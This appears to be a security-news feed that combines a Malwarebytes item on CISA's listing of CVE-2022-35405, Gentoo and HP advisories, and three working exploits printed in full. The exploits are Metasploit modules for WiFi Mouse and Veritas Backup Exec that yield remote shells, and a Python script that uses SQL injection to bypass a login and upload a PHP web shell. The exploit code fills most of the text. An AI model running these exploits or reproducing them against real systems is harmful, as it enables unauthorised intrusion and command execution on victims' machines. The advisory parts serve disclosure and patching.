Categories: Exploits and vulnerabilities
Categories: News
The critical CVE-2022-35405 flaw affects several Zoho ManageEngine products. Federal and private organizations must patch now!



(Read more...)




The post Flaw in some ManageEngine apps is being actively exploited, says CISA appeared first on Malwarebytes Labs.

CISA (the Cybersecurity and Infrastructure Security Agency) recently added **CVE-2022-35405—**a remote code execution(RCE) vulnerability affecting Zoho ManageEngine PAM360 (versions 5500 and earlier), Password Manager Pro (versions 12100 and earlier), and Access Manager Plus (versions 4302 and earlier)—to its Known Exploited Vulnerabilities (KEV) Catalog, a list of known CVEs that carry significant risk to the federal enterprise. Doing this forces all Federal Civilian Executive Branch Agencies (FCEB) to patch this bug.

According to BleepingComputer, federal agencies that may be affected by CVE-2022-35405 have until October 13 to ensure they're patched and their networks are protected from attacks leveraging this vulnerability.

CVE-2022-35405 is a critical vulnerability. When exploited, attackers can execute potentially malicious code on affected installations of ManageEngine software—without authentication for Password Manager Pro and PAM360, and with authentication for Access Manager Plus.

Researcher Vinicius Pereira first flagged this vulnerability in June 2022. Since then, several PoCs (proofs-of-concepts) and a Metasploit module for it have been made public.

ManageEngine "strongly recommends" that its clients upgrade their affected software as soon as possible. The company pointed to the following locations where customers can download updates:

*   Access Manager Plus - https://www.manageengine.com/privileged-session-management/upgradepack.html
*   PAM360 - https://www.manageengine.com/privileged-access-management/upgradepack.html
*   Password Manager Pro - https://www.manageengine.com/products/passwordmanagerpro/upgradepack.html

While private organizations don't have a ruling requiring them to patch noteworthy flaws, CISA still urges them to patch as soon as they can.

Flaw in some ManageEngine apps is being actively exploited, says CISA

The WiFi Mouse (Mouse Server) from Necta LLC contains an authentication bypass as the authentication is completely implemented entirely on the client side. By utilizing this vulnerability, is possible to open a program on the server (cmd.exe in our case) and type commands that will be executed as the user running WiFi Mouse (Mouse Server), resulting in remote code execution. Tested against versions 1.8.3.4 (current as of module writing) and 1.8.2.3.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Exploit::Remote::Tcp  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wifi Mouse RCE',        'Description' => %q{          The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the          authentication is completely implemented entirely on the client side. By utilizing          this vulnerability, is possible to open a program on the server          (cmd.exe in our case) and type commands that will be executed as the user running          WiFi Mouse (Mouse Server), resulting in remote code execution.          Tested against versions 1.8.3.4 (current as of module writing) and          1.8.2.3.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'REDHATAUGUST', # edb          'H4RK3NZ0' # edb, original discovery        ],        'References' => [          [ 'EDB', '50972' ],          [ 'EDB', '49601' ],          [ 'CVE', '2022-3218' ],          [ 'URL', 'http://wifimouse.necta.us/' ],          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py' ]        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Targets' => [          [            'stager',            {              'CmdStagerFlavor' => ['psh_invokewebrequest', 'certutil']            }          ],        ],        'Payload' => {          'BadChars' => "\x0a\x00"        },        'DefaultOptions' => {          # since this may get typed out ON SCREEN we want as small a payload as possible          'PAYLOAD' => 'windows/shell/reverse_tcp'        },        'DisclosureDate' => '2021-02-25',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [CRASH_SERVICE_DOWN],          'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port WiFi Mouse Mouse Server runs on', 1978]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),        OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method.  Smaller for more unstable connections.', 1_020]),      ]    )  end  def send_return    sock.put('key  3RTN') # what the mobile app sends  end  def send_command(command)    sock.put("utf8 #{command}\x0A")    sleep(datastore['SLEEP'])    send_return  end  def open_file(file)    file = "/#{file}".gsub('\\', '/').gsub(':', '')    sock.put("openfile #{file}\x0A")  end  def exploit    connect    print_status('Opening command prompt')    open_file('C:\\Windows\\System32\\cmd.exe')    sleep(datastore['SLEEP']) # give time for it to open    print_status('Typing out payload')    execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] })    handler  end  def execute_command(cmd, _opts = {})    send_command(cmd)  endend

WiFi Mouse 1.8.3.4 Remote Code Execution

Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them. This authentication scheme is no longer used within Backup Exec versions, but had not yet been disabled. An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges depending on the platform. The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and including Backup Exec Remote Agent revision 9.3).

    # frozen_string_literal: true### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  include Msf::Exploit::Remote::NDMPSocket  include Msf::Exploit::CmdStager  include Msf::Exploit::EXE  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Veritas Backup Exec Agent Remote Code Execution',        'Description' => %q{          Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them.          This authentication scheme is no longer used within Backup Exec versions, but hadn’t yet been disabled.          An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to          the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges          depending on the platform.          The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and          including Backup Exec Remote Agent revision 9.3)        },        'License' => MSF_LICENSE,        'Author' => ['Alexander Korotin <0xc0rs[at]gmail.com>'],        'References' => [          ['CVE', '2021-27876'],          ['CVE', '2021-27877'],          ['CVE', '2021-27878'],          ['URL', 'https://www.veritas.com/content/support/en_US/security/VTS21-001']        ],        'Platform' => %w[win linux],        'Targets' => [          [            'Windows',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => %w[certutil vbs psh_invokewebrequest debug_write debug_asm]            }          ],          [            'Linux',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => %w[bourne wget curl echo]            }          ]        ],        'DefaultOptions' => {          'RPORT' => 10_000        },        'Privileged' => true,        'DisclosureDate' => '2021-03-01',        'DefaultTarget' => 0,        'Notes' => {          'Reliability' => [UNRELIABLE_SESSION],          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('SHELL', [true, 'The shell for executing OS command', '/bin/bash'],                    conditions: ['TARGET', '==', 'Linux'])    ])    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')  end  def execute_command(cmd, opts = {})    case target.opts['Platform']    when 'win'      wrap_cmd = "C:\\Windows\\System32\\cmd.exe /c \"#{cmd}\""    when 'linux'      wrap_cmd = "#{datastore['SHELL']} -c \"#{cmd}\""    end    ndmp_sock = opts[:ndmp_sock]    ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_EXECUTE_COMMAND,        NdmpExecuteCommandReq.new({ cmd: wrap_cmd, unknown: 0 }).to_xdr      )    )  end  def exploit    print_status('Exploiting ...')    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect    fail_with(Msf::Module::Failure::NotFound, "Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status    ndmp_status, msg_fail_reason = tls_enabling(ndmp_sock)    fail_with(Msf::Module::Failure::UnexpectedReply, "Can not establish TLS connection. #{msg_fail_reason}") unless ndmp_status    ndmp_status, msg_fail_reason = sha_authentication(ndmp_sock)    fail_with(Msf::Module::Failure::NotVulnerable, "Can not authenticate with SHA. #{msg_fail_reason}") unless ndmp_status    if target.opts['Platform'] == 'win'      filename = "#{rand_text_alpha(8)}.exe"      ndmp_status, msg_fail_reason = win_write_upload(ndmp_sock, filename)      if ndmp_status        ndmp_status, msg_fail_reason = exec_win_command(ndmp_sock, filename)        fail_with(Msf::Module::Failure::PayloadFailed, "Can not execute payload. #{msg_fail_reason}") unless ndmp_status      else        print_status('Can not upload payload with NDMP_FILE_WRITE packet. Trying to upload with CmdStager')        execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })      end    else      print_status('Uploading payload with CmdStager')      execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })    end  end  def check    print_status('Checking vulnerability')    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect    return Exploit::CheckCode::Unknown("Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status    print_status('Getting supported authentication types')    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(NDMP::Message::CONFIG_GET_SERVER_INFO)    )    ndmp_payload = NdmpConfigGetServerInfoRes.from_xdr(ndmp_msg.body)    print_status("Supported authentication by BE agent: #{ndmp_payload.auth_types.map do |k, _|                                                          "#{AUTH_TYPES[k]} (#{k})"                                                        end.join(', ')}")    print_status("BE agent revision: #{ndmp_payload.revision}")    if ndmp_payload.auth_types.include?(5)      Exploit::CheckCode::Appears('SHA authentication is enabled')    else      Exploit::CheckCode::Safe('SHA authentication is disabled')    end  end  def ndmp_connect    print_status('Connecting to BE Agent service')    ndmp_msg = nil    begin      ndmp_sock = NDMP::Socket.new(connect)    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout,           Rex::ConnectionRefused => e      return [false, nil, e.to_s]    end    begin      Timeout.timeout(datastore['ConnectTimeout']) do        ndmp_msg = ndmp_sock.read_ndmp_msg(NDMP::Message::NOTIFY_CONNECTED)      end    rescue Timeout::Error      return [false, nil, 'No NDMP_NOTIFY_CONNECTED (0x502) packet from BE Agent service']    else      ndmp_payload = NdmpNotifyConnectedRes.from_xdr(ndmp_msg.body)    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP::Message::CONNECT_OPEN,        NdmpConnectOpenReq.new({ version: ndmp_payload.version }).to_xdr      )    )    ndmp_payload = NdmpConnectOpenRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, ndmp_sock, "Error code of NDMP_CONNECT_OPEN (0x900) packet: #{ndmp_payload.err_code}"]    end    [true, ndmp_sock, nil]  end  def tls_enabling(ndmp_sock)    print_status('Enabling TLS for NDMP connection')    ndmp_tls_certs = NdmpTlsCerts.new('VeritasBE', datastore['RHOSTS'].to_s)    ndmp_tls_certs.forge_ca    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_SSL_HANDSHAKE,        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_REQ])).to_xdr      )    )    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"]    end    ndmp_tls_certs.sign_agent_csr(ndmp_payload.data)    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_SSL_HANDSHAKE,        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED])).to_xdr      )    )    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of SSL_HANDSHAKE_CSR_SIGNED (3) packet: #{ndmp_payload.err_code}"]    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_SSL_HANDSHAKE,        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CONNECT])).to_xdr      )    )    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of SSL_HANDSHAKE_CONNECT (4) packet: #{ndmp_payload.err_code}"]    end    ssl_context = OpenSSL::SSL::SSLContext.new    ssl_context.add_certificate(ndmp_tls_certs.ca_cert, ndmp_tls_certs.ca_key)    ndmp_sock.wrap_with_ssl(ssl_context)    [true, nil]  end  def sha_authentication(ndmp_sock)    print_status('Passing SHA authentication')    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_CONFIG_GET_AUTH_ATTR,        NdmpConfigGetAuthAttrReq.new({ auth_type: 5 }).to_xdr      )    )    ndmp_payload = NdmpConfigGetAuthAttrRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_CONFIG_GET_AUTH_ATTR (0x103) packet: #{ndmp_payload.err_code}"]    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP::Message::CONNECT_CLIENT_AUTH,        NdmpConnectClientAuthReq.new(          {            auth_type: 5,            username: 'Administrator', # Doesn't metter            hash: Digest::SHA256.digest("\x00" * 64 + ndmp_payload.challenge)          }        ).to_xdr      )    )    ndmp_payload = NdmpConnectClientAuthRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_CONECT_CLIENT_AUTH (0x901) packet: #{ndmp_payload.err_code}"]    end    [true, nil]  end  def win_write_upload(ndmp_sock, filename)    print_status('Uploading payload with NDMP_FILE_WRITE packet')    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_FILE_OPEN_EXT,        NdmpFileOpenExtReq.new(          {            filename: filename,            dir: '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\Temp',            mode: 4          }        ).to_xdr      )    )    ndmp_payload = NdmpFileOpenExtRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_FILE_OPEN_EXT (0xf308) packet: #{ndmp_payload.err_code}"]    end    hnd = ndmp_payload.handler    exe = generate_payload_exe    offset = 0    block_size = 2048    while offset < exe.length      ndmp_msg = ndmp_sock.do_request_response(        NDMP::Message.new_request(          NDMP_FILE_WRITE,          NdmpFileWriteReq.new({ handler: hnd, len: block_size, data: exe[offset, block_size] }).to_xdr        )      )      ndmp_payload = NdmpFileWriteRes.from_xdr(ndmp_msg.body)      unless ndmp_payload.err_code.zero?        return [false, "Error code of NDMP_FILE_WRITE (0xF309) packet: #{ndmp_payload.err_code}"]      end      offset += block_size    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_FILE_CLOSE,        NdmpFileCloseReq.new({ handler: hnd }).to_xdr      )    )    ndmp_payload = NdmpFileCloseRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_FILE_CLOSE (0xF306) packet: #{ndmp_payload.err_code}"]    end    [true, nil]  end  def exec_win_command(ndmp_sock, filename)    cmd = "C:\\Windows\\System32\\cmd.exe /c \"C:\\Windows\\Temp\\#{filename}\""    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_EXECUTE_COMMAND,        NdmpExecuteCommandReq.new({ cmd: cmd, unknown: 0 }).to_xdr      )    )    ndmp_payload = NdmpExecuteCommandRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_EXECUTE_COMMAND (0xF30F) packet: #{ndmp_payload.err_code}"]    end    [true, nil]  end  # Class to create CA and client certificates  class NdmpTlsCerts    def initialize(hostname, ip)      @hostname = hostname      @ip = ip      @ca_key = nil      @ca_cert = nil      @be_agent_cert = nil    end    SSL_HANDSHAKE_TYPES = {      SSL_HANDSHAKE_TEST_CERT: 1,      SSL_HANDSHAKE_CSR_REQ: 2,      SSL_HANDSHAKE_CSR_SIGNED: 3,      SSL_HANDSHAKE_CONNECT: 4    }.freeze    attr_reader :ca_cert, :ca_key    def forge_ca      @ca_key = OpenSSL::PKey::RSA.new(2048)      @ca_cert = OpenSSL::X509::Certificate.new      @ca_cert.version = 2      @ca_cert.serial = rand(2**32..2**64 - 1)      @ca_cert.subject = @ca_cert.issuer = OpenSSL::X509::Name.parse("/CN=#{@hostname}")      extn_factory = OpenSSL::X509::ExtensionFactory.new(@ca_cert, @ca_cert)      @ca_cert.extensions = [        extn_factory.create_extension('subjectKeyIdentifier', 'hash'),        extn_factory.create_extension('basicConstraints', 'CA:TRUE'),        extn_factory.create_extension('keyUsage', 'keyCertSign, cRLSign')      ]      @ca_cert.add_extension(extn_factory.create_extension('authorityKeyIdentifier', 'keyid:always'))      @ca_cert.public_key = @ca_key.public_key      @ca_cert.not_before = Time.now - 7 * 60 * 60 * 24      @ca_cert.not_after = Time.now + 14 * 24 * 60 * 60      @ca_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256'))    end    def sign_agent_csr(csr)      o_csr = OpenSSL::X509::Request.new(csr)      @be_agent_cert = OpenSSL::X509::Certificate.new      @be_agent_cert.version = 2      @be_agent_cert.serial = rand(2**32..2**64 - 1)      @be_agent_cert.not_before = Time.now - 7 * 60 * 60 * 24      @be_agent_cert.not_after = Time.now + 14 * 24 * 60 * 60      @be_agent_cert.issuer = @ca_cert.subject      @be_agent_cert.subject = o_csr.subject      @be_agent_cert.public_key = o_csr.public_key      @be_agent_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256'))    end    def default_sslpacket_content(ssl_packet_type)      if ssl_packet_type == SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED]        ca_cert = @ca_cert.to_s        agent_cert = @be_agent_cert.to_s      else        ca_cert = ''        agent_cert = ''      end      {        ssl_packet_type: ssl_packet_type,        hostname: @hostname,        nb_hostname: @hostname.upcase,        ip_addr: @ip,        cert_id1: get_cert_id(@ca_cert),        cert_id2: get_cert_id(@ca_cert),        unknown1: 0,        unknown2: 0,        ca_cert_len: ca_cert.length,        ca_cert: ca_cert,        agent_cert_len: agent_cert.length,        agent_cert: agent_cert      }    end    def get_cert_id(cert)      Digest::SHA1.digest(cert.issuer.to_s + cert.serial.to_s(2))[0...4].unpack1('L<')    end  end  NDMP_CONFIG_GET_AUTH_ATTR = 0x103  NDMP_SSL_HANDSHAKE = 0xf383  NDMP_EXECUTE_COMMAND = 0xf30f  NDMP_FILE_OPEN_EXT = 0xf308  NDMP_FILE_WRITE = 0xF309  NDMP_FILE_CLOSE = 0xF306  AUTH_TYPES = {    1 => 'Text',    2 => 'MD5',    3 => 'BEWS',    4 => 'SSPI',    5 => 'SHA',    190 => 'BEWS2' # 0xBE  }.freeze  # Responce packets  class NdmpNotifyConnectedRes < XDR::Struct    attribute :connected, XDR::Int    attribute :version, XDR::Int    attribute :reason, XDR::Int  end  class NdmpConnectOpenRes < XDR::Struct    attribute :err_code, XDR::Int  end  class NdmpConfigGetServerInfoRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :vendor_name, XDR::String[]    attribute :product_name, XDR::String[]    attribute :revision, XDR::String[]    attribute :auth_types, XDR::VarArray[XDR::Int]  end  class NdmpConfigGetHostInfoRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :hostname, XDR::String[]    attribute :os, XDR::String[]    attribute :os_info, XDR::String[]    attribute :ip, XDR::String[]  end  class NdmpSslHandshakeRes < XDR::Struct    attribute :data_len, XDR::Int    attribute :data, XDR::String[]    attribute :err_code, XDR::Int    attribute :unknown4, XDR::String[]  end  class NdmpConfigGetAuthAttrRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :auth_type, XDR::Int    attribute :challenge, XDR::Opaque[64]  end  class NdmpConnectClientAuthRes < XDR::Struct    attribute :err_code, XDR::Int  end  class NdmpExecuteCommandRes < XDR::Struct    attribute :err_code, XDR::Int  end  class NdmpFileOpenExtRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :handler, XDR::Int  end  class NdmpFileWriteRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :recv_len, XDR::Int    attribute :unknown, XDR::Int  end  class NdmpFileCloseRes < XDR::Struct    attribute :err_code, XDR::Int  end  # Request packets  class NdmpConnectOpenReq < XDR::Struct    attribute :version, XDR::Int  end  class NdmpSslHandshakeReq < XDR::Struct    attribute :ssl_packet_type, XDR::Int    attribute :nb_hostname, XDR::String[]    attribute :hostname, XDR::String[]    attribute :ip_addr, XDR::String[]    attribute :cert_id1, XDR::Int    attribute :cert_id2, XDR::Int    attribute :unknown1, XDR::Int    attribute :unknown2, XDR::Int    attribute :ca_cert_len, XDR::Int    attribute :ca_cert, XDR::String[]    attribute :agent_cert_len, XDR::Int    attribute :agent_cert, XDR::String[]  end  class NdmpConfigGetAuthAttrReq < XDR::Struct    attribute :auth_type, XDR::Int  end  class NdmpConnectClientAuthReq < XDR::Struct    attribute :auth_type, XDR::Int    attribute :username, XDR::String[]    attribute :hash, XDR::Opaque[32]  end  class NdmpExecuteCommandReq < XDR::Struct    attribute :cmd, XDR::String[]    attribute :unknown, XDR::Int  end  class NdmpFileOpenExtReq < XDR::Struct    attribute :filename, XDR::String[]    attribute :dir, XDR::String[]    attribute :mode, XDR::Int  end  class NdmpFileWriteReq < XDR::Struct    attribute :handler, XDR::Int    attribute :len, XDR::Int    attribute :data, XDR::String[]  end  class NdmpFileCloseReq < XDR::Struct    attribute :handler, XDR::Int  endend

Veritas Backup Exec Agent Remote Code Execution

Online Diagnostic Lab Management System version 1.0 remote exploit that bypasses login with SQL injection and then uploads a shell.

    # Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)# Google Dork: N/A# Date: 2022-9-23# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# Authentication Required: bypass login with sql injection #/usr/bin/python3 import requests import osimport sysimport timeimport random# clean screenos.system("cls")os.system("clear")logo = '''###################################################################                                                                #  #    Exploit Script ( Online Diagnostic Lab Management System )  ##                                                                ###################################################################'''print(logo)url = str(input("Enter website url : "))username = ("' OR 1=1-- -")password = ("test")req = requests.Session()target = url+"/diagnostic/login.php"data = {'username':username,'password':password}website = req.post(target,data=data)files = open("rev.php","w")payload = "<?php system($_GET['cmd']);?>"files.write(payload)files.close()hash = random.getrandbits(128)name_file = str(hash)+".php"if "Login Successfully" in website.text:        print("[+] Login Successfully")    website_1 = url+"/diagnostic/php_action/createOrder.php"    upload_file = {         "orderDate": (None,""),        "clientName": (None,""),        "clientContact" : (None,""),        "productName[]" : (None,""),        "rateValue[]" : (None,""),        "quantity[]" : (None,""),        "totalValue[]" : (None,""),        "subTotalValue" : (None,""),        "totalAmountValue" : (None,""),        "discount" : (None,""),        "grandTotalValue" : (None,""),        "gstn" : (None,""),        "vatValue" : (None,""),        "paid" : (None,""),        "dueValue" : (None,""),        "paymentType" : (None,""),        "paymentStatus" : (None,""),        "paymentPlace" : (None,""),        "productImage" : (name_file,open("rev.php","rb"))        }     up = req.post(website_1,files=upload_file)    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")else:     print("[-] Check username or password")

Online Diagnostic Lab Management System 1.0 SQL Injection / Shell Upload

Gentoo Linux Security Advisory 202209-9 - Multiple vulnerabilities have been found in Smarty, the worst of which could result in remote code execution. Versions less than 4.2.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Smarty: Multiple vulnerabilities  
     Date: September 25, 2022  
     Bugs: #830980, #845180, #870100  
       ID: 202209-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Smarty, the worst of which  
could result in remote code execution

Background  
==========

Smarty is a template engine for PHP. The "template security" feature of  
Smarty is designed to help reduce the risk of a system compromise when  
you have untrusted parties editing templates.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-php/smarty             < 4.2.1                      >= 4.2.1

Description  
===========

Multiple vulnerabilities have been discovered in Smarty. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Smarty users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-php/smarty-4.2.1"

References  
==========

[ 1 ] CVE-2018-25047  
      https://nvd.nist.gov/vuln/detail/CVE-2018-25047  
[ 2 ] CVE-2021-21408  
      https://nvd.nist.gov/vuln/detail/CVE-2021-21408  
[ 3 ] CVE-2021-29454  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29454  
[ 4 ] CVE-2022-29221  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29221

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-09

Certain HP Print Products are potentially vulnerable to Buffer Overflow.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP Print Products are potentially vulnerable to Buffer Overflow and/or Remote Code Execution.

Severity

Critical

HP Reference

HPSBPI03810 rev. 1

Release date

September 21, 2022

Last updated

September 21, 2022

Category

Print

Potential Security Impact

Potential Buffer Overflow, Remote Code Execution

**Relevant Common Vulnerabilities and Exposures (CVE) List**

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2022-28721

9.8

Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-28722

7.1

High

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

PSR-2022-0021

**Resolution**

Update your printer firmware.

HP has provided firmware updates for potentially affected products listed in the table below. To obtain the updated firmware listed below, go to the HP Software and Driver Downloads, and then search for your printer model.

**Affected products**

Find the products affected and the firmware version that resolves the vulnerabilities.

**HP inkjet printers**

Review the table for affected HP inkjet printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP DeskJet Ink Advantage 5000 All-in-One Printer series

M2U86A, M2U86B, M2U86C, M2U87A, M2U87B, M2U88B, M2U89B

Affected

Not Affected

2211A or higher

HP DeskJet Ink Advantage 5200 All-in-One Printer series

M2U76A, M2U77A

Affected

Not Affected

2211C or higher

HP DeskJet Plus Ink Advantage 6000 All-in-One Printer series

5SE522A

Affected

Not Affected

001.2214A or higher

HP DeskJet Plus Ink Advantage 6400 All-in-One Printer series

5SD78A, 5SD79A

Affected

Not Affected

001.2214A or higher

HP ENVY 5000 All-in-One Printer series

M2U85B, Z4A59A, Z4A71A, M2U91B, Z4A69A, M2U92B, Z4A70A, M2U94B, Z4A73A, Z4A74A, M2U91A, M2U92A, M2U85A, M2U94A, Z4A54A, Z4A60A, Z4A61A, Z4A61B

Affected

Not Affected

2211C or higher

HP ENVY 6000 All-in-One Printer series

5SE17A, 6WD35A, 7CZ37A, 5SE18A, 5SE16A, 5SE19A, 5SE20A, 8QQ97A, 8QQ98A, 8QQ99A

Affected

Not Affected

001.2214B or higher

HP ENVY 6000e All-In-One Printer series

223N6A, 2K4V8A, 2K4W1A, 2K4W2A, 223N2A, 223N1A, 223N5A, 223N9A

Affected

Not Affected

001.2216A or higher

HP ENVY 6400e All-In-One Printer series

223R6A, 2K5L5A, 223R2A, 223R1A, 223R3A, 223R9A

Affected

Not Affected

001.2216A or higher

HP ENVY Photo 6200 All-in-One Printer series

K7G22A, K7G18A, K7G23A, Y0K15A, K7D05A

Affected

Not Affected

003.2220B or higher

HP ENVY Photo 7100 All-in-One Printer series

Z3M37A, K7G93A, Z3M52A, 3XD89A, K7G95A, K7G96A, K7G99A

Affected

Not Affected

003.2220B or higher

HP ENVY Photo 7800 All-in-One Printer series

K7R96A, K7S00A, K7S08A, K7S01A

Affected

Not Affected

003.2220B or higher

HP ENVY Pro 6400 All-in-One Printer series

5SE46A, 6WD14A, 6WD16A, 5SE47A, 5SE45A, 5SE48A, 7XK12A, 5SE50A, 8QQ86A, 8QQ87A, 8QQ88A

Affected

Not Affected

001.2214B or higher

HP OfficeJet 5200 All-in-One Printer series

M2U81A, Z4B29A, M2U81B, Z4B27A, M2U82B, Z4B28A, M2U84B, M2U82A, M2U75A, M2U84A, Z4B12A, Z4B13A, Z4B14A, Z4B18A

Affected

Not Affected

2211A or higher

